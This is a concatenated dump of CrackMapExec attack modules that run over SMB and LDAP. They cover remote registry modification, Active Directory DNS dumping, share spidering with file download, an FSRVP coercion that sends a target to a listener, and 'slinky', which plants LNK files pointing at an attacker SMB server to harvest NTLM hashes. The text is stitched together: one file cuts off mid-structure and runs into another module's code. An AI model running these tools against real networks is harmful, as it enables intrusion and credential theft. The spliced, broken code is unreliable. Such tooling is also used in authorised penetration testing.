from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
class CMEModule:
name = "reg-query"
description = "Performs a registry query on the machine"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.delete = None
self.type = None
self.value = None
self.key = None
self.path = None
def options(self, context, module_options):
"""
PATH Registry key path to query
KEY Registry key value to retrieve
VALUE Registry key value to set (only used for modification)
Will add a new registry key if the registry key does not already exist
TYPE Type of registry to modify, add or delete. Default type : REG_SZ.
Type supported: REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
DELETE If set to True, delete a registry key if it does exist
"""
self.context = context
self.path = None
self.key = None
self.value = None
self.type = None
self.delete = False
if module_options and "PATH" in module_options:
self.path = module_options["PATH"]
if module_options and "KEY" in module_options:
self.key = module_options["KEY"]
if "VALUE" in module_options:
self.value = module_options["VALUE"]
if "TYPE" in module_options:
type_dict = {
"REG_NONE": rrp.REG_NONE,
"REG_SZ": rrp.REG_SZ,
"REG_EXPAND_SZ": rrp.REG_EXPAND_SZ,
"REG_BINARY": rrp.REG_BINARY,
"REG_DWORD": rrp.REG_DWORD,
"REG_DWORD_BIG_ENDIAN": rrp.REG_DWORD_BIG_ENDIAN,
"REG_LINK": rrp.REG_LINK,
"REG_MULTI_SZ": rrp.REG_MULTI_SZ,
"REG_QWORD": rrp.REG_QWORD,
}
self.type = module_options["TYPE"]
if "WORD" in self.type:
try:
self.value = int(self.value)
except:
context.log.fail(f"Invalid registry value type specified: {self.value}")
return
if self.type in type_dict:
self.type = type_dict[self.type]
else:
context.log.fail(f"Invalid registry value type specified: {self.type}")
return
else:
self.type = 1
if module_options and "DELETE" in module_options and module_options["DELETE"].lower() == "true":
self.delete = True
def on_admin_login(self, context, connection):
self.context = context
if not self.path:
self.context.log.fail("Please provide the path of the registry to query")
return
if not self.key:
self.context.log.fail("Please provide the registry key to query")
return
remote_ops = RemoteOperations(connection.conn, False)
remote_ops.enableRegistry()
try:
if "HKLM" in self.path or "HKEY_LOCAL_MACHINE" in self.path:
self.path = self.path.replace("HKLM\\", "")
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
elif "HKCU" in self.path or "HKEY_CURRENT_USER" in self.path:
self.path = self.path.replace("HKCU\\", "")
ans = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)
elif "HKCR" in self.path or "HKEY_CLASSES_ROOT" in self.path:
self.path = self.path.replace("HKCR\\", "")
ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp)
else:
self.context.log.fail(f"Unsupported registry hive specified in path: {self.path}")
return
reg_handle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(remote_ops._RemoteOperations__rrp, reg_handle, self.path)
key_handle = ans["phkResult"]
if self.delete:
# Delete registry
try:
# Check if value exists
data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
except:
self.context.log.fail(f"Registry key {self.key} does not exist")
return
# Delete value
rrp.hBaseRegDeleteValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
self.context.log.success(f"Registry key {self.key} has been deleted successfully")
rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
if self.value is not None:
# Check if value exists
try:
# Check if value exists
data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
self.context.log.highlight(f"Key {self.key} exists with value {reg_value}")
# Modification
rrp.hBaseRegSetValue(
remote_ops._RemoteOperations__rrp,
key_handle,
self.key,
self.type,
self.value,
)
self.context.log.success(f"Key {self.key} has been modified to {self.value}")
except:
rrp.hBaseRegSetValue(
remote_ops._RemoteOperations__rrp,
key_handle,
self.key,
self.type,
self.value,
)
self.context.log.success(f"New Key {self.key} has been added with value {self.value}")
rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
else:
# Query
try:
data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
self.context.log.highlight(f"{self.key}: {reg_value}")
except:
if self.delete:
pass
else:
self.context.log.fail(f"Registry key {self.key} does not exist")
return
rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
except DCERPCException as e:
self.context.log.fail(f"DCERPC Error while querying or modifying registry: {e}")
except Exception as e:
self.context.log.fail(f"Error while querying or modifying registry: {e}")
finally:
remote_ops.finish()
================================================
FILE: cme/modules/runasppl.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class CMEModule:
name = "runasppl"
description = "Check if the registry value RunAsPPL is set or not"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
def options(self, context, module_options):
""""""
def on_admin_login(self, context, connection):
command = "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL"
context.log.display("Executing command")
p = connection.execute(command, True)
if "The system was unable to find the specified registry key or value" in p:
context.log.debug(f"Unable to find RunAsPPL Registry Key")
else:
context.log.highlight(p)
================================================
FILE: cme/modules/scan-network.py
================================================
# Credit to https://twitter.com/snovvcrash/status/1550518555438891009
# Credit to https://github.com/dirkjanm/adidnsdump @_dirkjan
# module by @mpgn_x64
from os.path import expanduser
import codecs
import socket
from builtins import str
from datetime import datetime
from struct import unpack
import dns.name
import dns.resolver
from impacket.structure import Structure
from ldap3 import LEVEL
def get_dns_zones(connection, root, debug=False):
connection.search(root, "(objectClass=dnsZone)", search_scope=LEVEL, attributes=["dc"])
zones = []
for entry in connection.response:
if entry["type"] != "searchResEntry":
continue
zones.append(entry["attributes"]["dc"])
return zones
def get_dns_resolver(server, context):
# Create a resolver object
dnsresolver = dns.resolver.Resolver()
# Is our host an IP? In that case make sure the server IP is used
# if not assume lookups are working already
try:
if server.startswith("ldap://"):
server = server[7:]
if server.startswith("ldaps://"):
server = server[8:]
socket.inet_aton(server)
dnsresolver.nameservers = [server]
except socket.error:
context.info("Using System DNS to resolve unknown entries. Make sure resolving your" " target domain works here or specify an IP as target host to use that" " server for queries")
return dnsresolver
def ldap2domain(ldap):
return re.sub(",DC=", ".", ldap[ldap.lower().find("dc=") :], flags=re.I)[3:]
def new_record(rtype, serial):
nr = DNS_RECORD()
nr["Type"] = rtype
nr["Serial"] = serial
nr["TtlSeconds"] = 180
# From authoritive zone
nr["Rank"] = 240
return nr
# From: https://docs.microsoft.com/en-us/windows/win32/dns/dns-constants
RECORD_TYPE_MAPPING = {
0: "ZERO",
1: "A",
2: "NS",
5: "CNAME",
6: "SOA",
12: "PTR",
# 15: 'MX',
# 16: 'TXT',
28: "AAAA",
33: "SRV",
}
def searchResEntry_to_dict(results):
data = {}
for attr in results["attributes"]:
key = str(attr["type"])
value = str(attr["vals"][0])
data[key] = value
return data
class CMEModule:
name = "get-network"
description = ""
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
ALL Get DNS and IP (default: false)
ONLY_HOSTS Get DNS only (no ip) (default: false)
"""
self.showall = False
self.showhosts = False
self.showip = True
if module_options and "ALL" in module_options:
if module_options["ALL"].lower() == "true" or module_options["ALL"] == "1":
self.showall = True
else:
print("Could not parse ALL option.")
if module_options and "IP" in module_options:
if module_options["IP"].lower() == "true" or module_options["IP"] == "1":
self.showip = True
else:
print("Could not parse ONLY_HOSTS option.")
if module_options and "ONLY_HOSTS" in module_options:
if module_options["ONLY_HOSTS"].lower() == "true" or module_options["ONLY_HOSTS"] == "1":
self.showhosts = True
else:
print("Could not parse ONLY_HOSTS option.")
def on_login(self, context, connection):
zone = ldap2domain(connection.baseDN)
dnsroot = "CN=MicrosoftDNS,DC=DomainDnsZones,%s" % connection.baseDN
searchtarget = "DC=%s,%s" % (zone, dnsroot)
context.log.display("Querying zone for records")
sfilter = "(DC=*)"
try:
list_sites = connection.ldapConnection.search(
searchBase=searchtarget,
searchFilter=sfilter,
attributes=["dnsRecord", "dNSTombstoned", "name"],
sizeLimit=100000,
)
except ldap.LDAPSearchError as e:
if e.getErrorString().find("sizeLimitExceeded") >= 0:
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the" " data received")
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
list_sites = e.getAnswers()
pass
else:
raise
targetentry = None
dnsresolver = get_dns_resolver(connection.host, context.log)
outdata = []
for item in list_sites:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
site = searchResEntry_to_dict(item)
recordname = site["name"]
if "dnsRecord" in site:
record = bytes(site["dnsRecord"].encode("latin1"))
dr = DNS_RECORD(record)
if RECORD_TYPE_MAPPING[dr["Type"]] == "A":
if dr["Type"] == 1:
address = DNS_RPC_RECORD_A(dr["Data"])
if str(recordname) != "DomainDnsZones" and str(recordname) != "ForestDnsZones":
outdata.append(
{
"name": recordname,
"type": RECORD_TYPE_MAPPING[dr["Type"]],
"value": address.formatCanonical(),
}
)
if dr["Type"] in [a for a in RECORD_TYPE_MAPPING if RECORD_TYPE_MAPPING[a] in ["CNAME", "NS", "PTR"]]:
address = DNS_RPC_RECORD_NODE_NAME(dr["Data"])
if str(recordname) != "DomainDnsZones" and str(recordname) != "ForestDnsZones":
outdata.append(
{
"name": recordname,
"type": RECORD_TYPE_MAPPING[dr["Type"]],
"value": address[list(address.fields)[0]].toFqdn(),
}
)
elif dr["Type"] == 28:
address = DNS_RPC_RECORD_AAAA(dr["Data"])
if str(recordname) != "DomainDnsZones" and str(recordname) != "ForestDnsZones":
outdata.append(
{
"name": recordname,
"type": RECORD_TYPE_MAPPING[dr["Type"]],
"value": address.formatCanonical(),
}
)
context.log.highlight("Found %d records" % len(outdata))
path = expanduser("~/.cme/logs/{}_network_{}.log".format(connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
with codecs.open(path, "w", "utf-8") as outfile:
for row in outdata:
if self.showhosts:
outfile.write("{}\n".format(row["name"] + "." + connection.domain))
elif self.showall:
outfile.write("{} \t {}\n".format(row["name"] + "." + connection.domain, row["value"]))
else:
outfile.write("{}\n".format(row["value"]))
context.log.success("Dumped {} records to {}".format(len(outdata), path))
if not self.showall and not self.showhosts:
context.log.display("To extract CIDR from the {} ip, run the following command: cat" " your_file | mapcidr -aa -silent | mapcidr -a -silent".format(len(outdata)))
class DNS_RECORD(Structure):
"""
dnsRecord - used in LDAP
[MS-DNSP] section 2.3.2.2
"""
structure = (
("DataLength", "L"),
("Reserved", "H"),
("wRecordCount", ">H"),
("dwFlags", ">L"),
("dwChildCount", ">L"),
("dnsNodeName", ":"),
)
class DNS_RPC_RECORD_A(Structure):
"""
DNS_RPC_RECORD_A
[MS-DNSP] section 2.2.2.2.4.1
"""
structure = (("address", ":"),)
def formatCanonical(self):
return socket.inet_ntoa(self["address"])
def fromCanonical(self, canonical):
self["address"] = socket.inet_aton(canonical)
class DNS_RPC_RECORD_NODE_NAME(Structure):
"""
DNS_RPC_RECORD_NODE_NAME
[MS-DNSP] section 2.2.2.2.4.2
"""
structure = (("nameNode", ":", DNS_COUNT_NAME),)
class DNS_RPC_RECORD_SOA(Structure):
"""
DNS_RPC_RECORD_SOA
[MS-DNSP] section 2.2.2.2.4.3
"""
structure = (
("dwSerialNo", ">L"),
("dwRefresh", ">L"),
("dwRetry", ">L"),
("dwExpire", ">L"),
("dwMinimumTtl", ">L"),
("namePrimaryServer", ":", DNS_COUNT_NAME),
("zoneAdminEmail", ":", DNS_COUNT_NAME),
)
class DNS_RPC_RECORD_NULL(Structure):
"""
DNS_RPC_RECORD_NULL
[MS-DNSP] section 2.2.2.2.4.4
"""
structure = (("bData", ":"),)
# Some missing structures here that I skipped
class DNS_RPC_RECORD_NAME_PREFERENCE(Structure):
"""
DNS_RPC_RECORD_NAME_PREFERENCE
[MS-DNSP] section 2.2.2.2.4.8
"""
structure = (("wPreference", ">H"), ("nameExchange", ":", DNS_COUNT_NAME))
# Some missing structures here that I skipped
class DNS_RPC_RECORD_AAAA(Structure):
"""
DNS_RPC_RECORD_AAAA
[MS-DNSP] section 2.2.2.2.4.17
"""
structure = (("ipv6Address", "16s"),)
def formatCanonical(self):
return socket.inet_ntop(socket.AF_INET6, self["ipv6Address"])
class DNS_RPC_RECORD_SRV(Structure):
"""
DNS_RPC_RECORD_SRV
[MS-DNSP] section 2.2.2.2.4.18
"""
structure = (
("wPriority", ">H"),
("wWeight", ">H"),
("wPort", ">H"),
("nameTarget", ":", DNS_COUNT_NAME),
)
class DNS_RPC_RECORD_TS(Structure):
"""
DNS_RPC_RECORD_TS
[MS-DNSP] section 2.2.2.2.4.23
"""
structure = (("entombedTime", "= 0:
dce.disconnect()
return 1
cme_logger.debug("Something went wrong, check error status => %s" % str(e))
cme_logger.info("Connected!")
cme_logger.info("Binding to %s" % binding_params[pipe]["UUID"][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]["UUID"]))
except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s" % str(e))
cme_logger.info("Successfully bound!")
return dce
def IsPathShadowCopied(self, dce, listener):
cme_logger.debug("Sending IsPathShadowCopied!")
try:
request = IsPathShadowCopied()
# only NETLOGON and SYSVOL were detected working here
# setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)
request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener
# request.dump()
dce.request(request)
except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s", str(e))
cme_logger.debug("Attack may of may not have worked, check your listener...")
return False
return True
def IsPathSupported(self, dce, listener):
cme_logger.debug("Sending IsPathSupported!")
try:
request = IsPathSupported()
# only NETLOGON and SYSVOL were detected working here
# setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)
request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener
dce.request(request)
except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s", str(e))
cme_logger.debug("Attack may of may not have worked, check your listener...")
return False
return True
================================================
FILE: cme/modules/slinky.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pylnk3
import ntpath
from sys import exit
class CMEModule:
"""
Original idea and PoC by Justin Angel (@4rch4ngel86)
Module by @byt3bl33d3r
"""
name = "slinky"
description = "Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions"
supported_protocols = ["smb"]
opsec_safe = False
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.server = None
self.file_path = None
self.lnk_path = None
self.lnk_name = None
self.cleanup = None
def options(self, context, module_options):
"""
SERVER IP of the SMB server
NAME LNK file name
CLEANUP Cleanup (choices: True or False)
"""
self.cleanup = False
if "CLEANUP" in module_options:
self.cleanup = bool(module_options["CLEANUP"])
if "NAME" not in module_options:
context.log.fail("NAME option is required!")
exit(1)
if not self.cleanup and "SERVER" not in module_options:
context.log.fail("SERVER option is required!")
exit(1)
self.lnk_name = module_options["NAME"]
self.lnk_path = f"/tmp/{self.lnk_name}.lnk"
self.file_path = ntpath.join("\\", f"{self.lnk_name}.lnk")
if not self.cleanup:
self.server = module_options["SERVER"]
link = pylnk3.create(self.lnk_path)
link.icon = f"\\\\{self.server}\\icons\\icon.ico"
link.save()
def on_login(self, context, connection):
shares = connection.shares()
for share in shares:
if "WRITE" in share["access"] and share["name"] not in [
"C$",
"ADMIN$",
"NETLOGON",
]:
context.log.success(f"Found writable share: {share['name']}")
if not self.cleanup:
with open(self.lnk_path, "rb") as lnk:
try:
connection.conn.putFile(share["name"], self.file_path, lnk.read)
context.log.success(f"Created LNK file on the {share['name']} share")
except Exception as e:
context.log.fail(f"Error writing LNK file to share {share['name']}: {e}")
else:
try:
connection.conn.deleteFile(share["name"], self.file_path)
context.log.success(f"Deleted LNK file on the {share['name']} share")
except Exception as e:
context.log.fail(f"Error deleting LNK file on share {share['name']}: {e}")
================================================
FILE: cme/modules/spider_plus.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import errno
import os
import time
import traceback
from cme.protocols.smb.remotefile import RemoteFile
from impacket.smb3structs import FILE_READ_DATA
from impacket.smbconnection import SessionError
CHUNK_SIZE = 4096
def human_size(nbytes):
"""
This function takes a number of bytes as input and converts it to a human-readable
size representation with appropriate units (e.g., KB, MB, GB, TB).
"""
suffixes = ["B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB"]
# Find the appropriate unit suffix and convert bytes to higher units
for i in range(len(suffixes)):
if nbytes < 1024 or i == len(suffixes) - 1:
break
nbytes /= 1024.0
# Format the number of bytes with two decimal places and remove trailing zeros and decimal point
size_str = f"{nbytes:.2f}".rstrip("0").rstrip(".")
# Return the human-readable size with the appropriate unit suffix
return f"{size_str} {suffixes[i]}"
def human_time(timestamp):
"""This function takes a numerical timestamp (seconds since the epoch) and formats it
as a human-readable date and time in the format "YYYY-MM-DD HH:MM:SS".
"""
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(timestamp))
def make_dirs(path):
"""
This function attempts to create directories at the given path. It handles the
exception `os.errno.EEXIST` that may occur if the directories already exist.
"""
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
pass
def get_list_from_option(opt):
"""
This function takes a comma-separated string and converts it to a list of lowercase strings.
It filters out empty strings from the input before converting.
"""
return list(map(lambda o: o.lower(), filter(bool, opt.split(","))))
class SMBSpiderPlus:
def __init__(
self,
smb,
logger,
download_flag,
stats_flag,
exclude_exts,
exclude_filter,
max_file_size,
output_folder,
):
self.smb = smb
self.host = self.smb.conn.getRemoteHost()
self.max_connection_attempts = 5
self.logger = logger
self.results = {}
self.stats = {
"shares": list(),
"shares_readable": list(),
"shares_writable": list(),
"num_shares_filtered": 0,
"num_folders": 0,
"num_folders_filtered": 0,
"num_files": 0,
"file_sizes": list(),
"file_exts": set(),
"num_get_success": 0,
"num_get_fail": 0,
"num_files_filtered": 0,
"num_files_unmodified": 0,
"num_files_updated": 0,
}
self.download_flag = download_flag
self.stats_flag = stats_flag
self.exclude_filter = exclude_filter
self.exclude_exts = exclude_exts
self.max_file_size = max_file_size
self.output_folder = output_folder
# Make sure the output_folder exists
make_dirs(self.output_folder)
def reconnect(self):
"""This function performs a series of reconnection attempts, up to `self.max_connection_attempts`,
with a 3-second delay between each attempt. It renegotiates the session by creating a new
connection object and logging in again.
"""
for i in range(1, self.max_connection_attempts + 1):
self.logger.display(f"Reconnection attempt #{i}/{self.max_connection_attempts} to server.")
# Renegotiate the session
time.sleep(3)
self.smb.create_conn_obj()
self.smb.login()
return True
return False
def list_path(self, share, subfolder):
"""This function returns a list of paths for a given share/folder."""
filelist = []
try:
# Get file list for the current folder
filelist = self.smb.conn.listPath(share, subfolder + "*")
except SessionError as e:
self.logger.debug(f'Failed listing files on share "{share}" in folder "{subfolder}".')
self.logger.debug(str(e))
if "STATUS_ACCESS_DENIED" in str(e):
self.logger.debug(f'Cannot list files in folder "{subfolder}".')
elif "STATUS_OBJECT_PATH_NOT_FOUND" in str(e):
self.logger.debug(f"The folder {subfolder} does not exist.")
elif self.reconnect():
filelist = self.list_path(share, subfolder)
return filelist
def get_remote_file(self, share, path):
"""This function will check if a path is readable in a SMB share."""
try:
remote_file = RemoteFile(self.smb.conn, path, share, access=FILE_READ_DATA)
return remote_file
except SessionError:
if self.reconnect():
return self.get_remote_file(share, path)
return None
def read_chunk(self, remote_file, chunk_size=CHUNK_SIZE):
"""This function reads the next chunk of data from the provided remote file using
the specified chunk size. If a `SessionError` is encountered,
it retries up to 3 times by reconnecting the SMB connection. If the maximum number
of retries is exhausted or an unexpected exception occurs, it returns an empty chunk.
"""
chunk = ""
retry = 3
while retry > 0:
retry -= 1
try:
chunk = remote_file.read(chunk_size)
break
except SessionError:
if self.reconnect():
# Little hack to reset the smb connection instance
remote_file.__smbConnection = self.smb.conn
return self.read_chunk(remote_file)
except Exception:
traceback.print_exc()
break
return chunk
def get_file_save_path(self, remote_file):
"""This function processes the remote file path to extract the filename and the folder
path where the file should be saved locally. It converts forward slashes (/) and backslashes (\)
in the remote file path to the appropriate path separator for the local file system.
The folder path and filename are then obtained separately.
"""
# Remove the backslash before the remote host part and replace slashes with the appropriate path separator
remote_file_path = str(remote_file)[2:].replace("/", os.path.sep).replace("\\", os.path.sep)
# Split the path to obtain the folder path and the filename
folder, filename = os.path.split(remote_file_path)
# Join the output folder with the folder path to get the final local folder path
folder = os.path.join(self.output_folder, folder)
return folder, filename
def spider_shares(self):
"""This function enumerates all available shares for the SMB connection, spiders
through the readable shares, and saves the metadata of the shares to a JSON file.
"""
self.logger.info("Enumerating shares for spidering.")
shares = self.smb.shares()
try:
# Get all available shares for the SMB connection
for share in shares:
share_perms = share["access"]
share_name = share["name"]
self.stats["shares"].append(share_name)
self.logger.info(f'Share "{share_name}" has perms {share_perms}')
if "WRITE" in share_perms:
self.stats["shares_writable"].append(share_name)
if "READ" in share_perms:
self.stats["shares_readable"].append(share_name)
else:
# We only want to spider readable shares
self.logger.debug(f'Share "{share_name}" not readable.')
continue
# `exclude_filter` is applied to the shares name
if share_name.lower() in self.exclude_filter:
self.logger.info(f'Share "{share_name}" has been excluded.')
self.stats["num_shares_filtered"] += 1
continue
try:
# Start the spider at the root of the share folder
self.results[share_name] = {}
self.spider_folder(share_name, "")
except SessionError:
traceback.print_exc()
self.logger.fail(f"Got a session error while spidering.")
self.reconnect()
except Exception as e:
traceback.print_exc()
self.logger.fail(f"Error enumerating shares: {str(e)}")
# Save the metadata.
self.dump_folder_metadata(self.results)
# Print stats.
if self.stats_flag:
self.print_stats()
return self.results
def spider_folder(self, share_name, folder):
"""This recursive function traverses through the contents of the specified share and folder.
It checks each entry (file or folder) against various filters, performs file metadata recording,
and downloads eligible files if the download flag is set.
"""
self.logger.info(f'Spider share "{share_name}" in folder "{folder}".')
filelist = self.list_path(share_name, folder + "*")
# For each entry:
# - It's a folder then we spider it (skipping `.` and `..`)
# - It's a file then we apply the checks
for result in filelist:
next_filedir = result.get_longname()
if next_filedir in [".", ".."]:
continue
next_fullpath = folder + next_filedir
result_type = "folder" if result.is_directory() else "file"
self.stats[f"num_{result_type}s"] += 1
# Check file-dir exclusion filter.
if any(d in next_filedir.lower() for d in self.exclude_filter):
self.logger.info(f'The {result_type} "{next_filedir}" has been excluded')
self.stats[f"{result_type}s_filtered"] += 1
continue
if result_type == "folder":
self.logger.info(f'Current folder in share "{share_name}": "{next_fullpath}"')
self.spider_folder(share_name, next_fullpath + "/")
else:
self.logger.info(f'Current file in share "{share_name}": "{next_fullpath}"')
self.parse_file(share_name, next_fullpath, result)
def parse_file(self, share_name, file_path, file_info):
"""This function checks file attributes against various filters, records file metadata,
and downloads eligible files if the download flag is set.
"""
# Record the file metadata
file_size = file_info.get_filesize()
file_creation_time = file_info.get_ctime_epoch()
file_modified_time = file_info.get_mtime_epoch()
file_access_time = file_info.get_atime_epoch()
self.results[share_name][file_path] = {
"size": human_size(file_size),
"ctime_epoch": human_time(file_creation_time),
"mtime_epoch": human_time(file_modified_time),
"atime_epoch": human_time(file_access_time),
}
self.stats["file_sizes"].append(file_size)
# Check if proceeding with download attempt.
if not self.download_flag:
return
# Check file extension filter.
_, file_extension = os.path.splitext(file_path)
if file_extension:
self.stats["file_exts"].add(file_extension.lower())
if file_extension.lower() in self.exclude_exts:
self.logger.info(f'The file "{file_path}" has an excluded extension.')
self.stats["num_files_filtered"] += 1
return
# Check file size limits.
if file_size > self.max_file_size:
self.logger.info(f"File {file_path} has size {human_size(file_size)} > max size {human_size(self.max_file_size)}.")
self.stats["num_files_filtered"] += 1
return
# Check if the remote file is readable.
remote_file = self.get_remote_file(share_name, file_path)
if not remote_file:
self.logger.fail(f'Cannot read remote file "{file_path}".')
self.stats["num_get_fail"] += 1
return
# Check if the file is already downloaded and up-to-date.
file_dir, file_name = self.get_file_save_path(remote_file)
download_path = os.path.join(file_dir, file_name)
needs_update_flag = False
if os.path.exists(download_path):
if file_modified_time <= os.stat(download_path).st_mtime and os.path.getsize(download_path) == file_size:
self.logger.info(f'File already downloaded "{file_path}" => "{download_path}".')
self.stats["num_files_unmodified"] += 1
return
else:
needs_update_flag = True
# Download file.
download_success = False
try:
self.logger.info(f'Downloading file "{file_path}" => "{download_path}".')
remote_file.open()
self.save_file(remote_file, share_name)
remote_file.close()
download_success = True
except SessionError as e:
if "STATUS_SHARING_VIOLATION" in str(e):
pass
except Exception as e:
self.logger.fail(f'Failed to download file "{file_path}". Error: {str(e)}')
# Increment stats counters
if download_success:
self.stats["num_get_success"] += 1
if needs_update_flag:
self.stats["num_files_updated"] += 1
else:
self.stats["num_get_fail"] += 1
def save_file(self, remote_file, share_name):
"""This function reads the `remote_file` in chunks using the `read_chunk` method.
Each chunk is then written to the local file until the entire file is saved.
It handles cases where the file remains empty due to errors.
"""
# Reset the remote_file to point to the beginning of the file.
remote_file.seek(0, 0)
folder, filename = self.get_file_save_path(remote_file)
download_path = os.path.join(folder, filename)
# Create the subdirectories based on the share name and file path.
self.logger.debug(f'Create folder "{folder}"')
make_dirs(folder)
try:
with open(download_path, "wb") as fd:
while True:
chunk = self.read_chunk(remote_file)
if not chunk:
break
fd.write(chunk)
except Exception as e:
self.logger.fail(f'Error writing file "{remote_path}" from share "{share_name}": {e}')
# Check if the file is empty and should not be.
if os.path.getsize(download_path) == 0 and remote_file.get_filesize() > 0:
os.remove(download_path)
remote_path = str(remote_file)[2:]
self.logger.fail(f'Unable to download file "{remote_path}".')
def dump_folder_metadata(self, results):
"""This function takes the metadata results as input and writes them to a JSON file
in the `self.output_folder`. The results are formatted with indentation and
sorted keys before being written to the file.
"""
metadata_path = os.path.join(self.output_folder, f"{self.host}.json")
try:
with open(metadata_path, "w", encoding="utf-8") as fd:
fd.write(json.dumps(results, indent=4, sort_keys=True))
self.logger.success(f'Saved share-file metadata to "{metadata_path}".')
except Exception as e:
self.logger.fail(f"Failed to save share metadata: {str(e)}")
def print_stats(self):
"""This function prints the statistics during processing."""
# Share statistics.
shares = self.stats.get("shares", [])
if shares:
num_shares = len(shares)
shares_str = ", ".join(shares)
self.logger.display(f"SMB Shares: {num_shares} ({shares_str})")
shares_readable = self.stats.get("shares_readable", [])
if shares_readable:
num_readable_shares = len(shares_readable)
if len(shares_readable) > 10:
shares_readable_str = ", ".join(shares_readable[:10]) + "..."
else:
shares_readable_str = ", ".join(shares_readable)
self.logger.display(f"SMB Readable Shares: {num_readable_shares} ({shares_readable_str})")
shares_writable = self.stats.get("shares_writable", [])
if shares_writable:
num_writable_shares = len(shares_writable)
if len(shares_writable) > 10:
shares_writable_str = ", ".join(shares_writable[:10]) + "..."
else:
shares_writable_str = ", ".join(shares_writable)
self.logger.display(f"SMB Writable Shares: {num_writable_shares} ({shares_writable_str})")
num_shares_filtered = self.stats.get("num_shares_filtered", 0)
if num_shares_filtered:
self.logger.display(f"SMB Filtered Shares: {num_shares_filtered}")
# Folder statistics.
num_folders = self.stats.get("num_folders", 0)
self.logger.display(f"Total folders found: {num_folders}")
num_folders_filtered = self.stats.get("num_folders_filtered", 0)
if num_folders_filtered:
num_filtered_folders = len(num_folders_filtered)
self.logger.display(f"Folders Filtered: {num_filtered_folders}")
# File statistics.
num_files = self.stats.get("num_files", 0)
self.logger.display(f"Total files found: {num_files}")
num_files_filtered = self.stats.get("num_files_filtered", 0)
if num_files_filtered:
self.logger.display(f"Files filtered: {num_files_filtered}")
if num_files == 0:
return
# File sizing statistics.
file_sizes = self.stats.get("file_sizes", [])
if file_sizes:
total_file_size = sum(file_sizes)
min_file_size = min(file_sizes)
max_file_size = max(file_sizes)
average_file_size = total_file_size / num_files
self.logger.display(f"File size average: {human_size(average_file_size)}")
self.logger.display(f"File size min: {human_size(min_file_size)}")
self.logger.display(f"File size max: {human_size(max_file_size)}")
# Extension statistics.
file_exts = list(self.stats.get("file_exts", []))
if file_exts:
num_unique_file_exts = len(file_exts)
if len(file_exts) > 10:
unique_exts_str = ", ".join(file_exts[:10]) + "..."
else:
unique_exts_str = ", ".join(file_exts)
self.logger.display(f"File unique exts: {num_unique_file_exts} ({unique_exts_str})")
# Download statistics.
if self.download_flag:
num_get_success = self.stats.get("num_get_success", 0)
if num_get_success:
self.logger.display(f"Downloads successful: {num_get_success}")
num_get_fail = self.stats.get("num_get_fail", 0)
if num_get_fail:
self.logger.display(f"Downloads failed: {num_get_fail}")
num_files_unmodified = self.stats.get("num_files_unmodified", 0)
if num_files_unmodified:
self.logger.display(f"Unmodified files: {num_files_unmodified}")
num_files_updated = self.stats.get("num_files_updated", 0)
if num_files_updated:
self.logger.display(f"Updated files: {num_files_updated}")
if num_files_unmodified and not num_files_updated:
self.logger.display("All files were not changed.")
if num_files_filtered == num_files:
self.logger.display("All files were ignored.")
if num_get_fail == 0:
self.logger.success("All files processed successfully.")
class CMEModule:
"""
Spider plus module
Module by @vincd
Updated by @godylockz
"""
name = "spider_plus"
description = "List files recursively (excluding `EXCLUDE_FILTER` and `EXCLUDE_EXTS` extensions) and save JSON share-file metadata to the `OUTPUT_FOLDER`. If `DOWNLOAD_FLAG`=True, download files smaller then `MAX_FILE_SIZE` to the `OUTPUT_FOLDER`."
supported_protocols = ["smb"]
opsec_safe = True # Does the module touch disk?
multiple_hosts = True # Does the module support multiple hosts?
def options(self, context, module_options):
"""
DOWNLOAD_FLAG Download all share folders/files (Default: False)
STATS_FLAG Disable file/download statistics (Default: True)
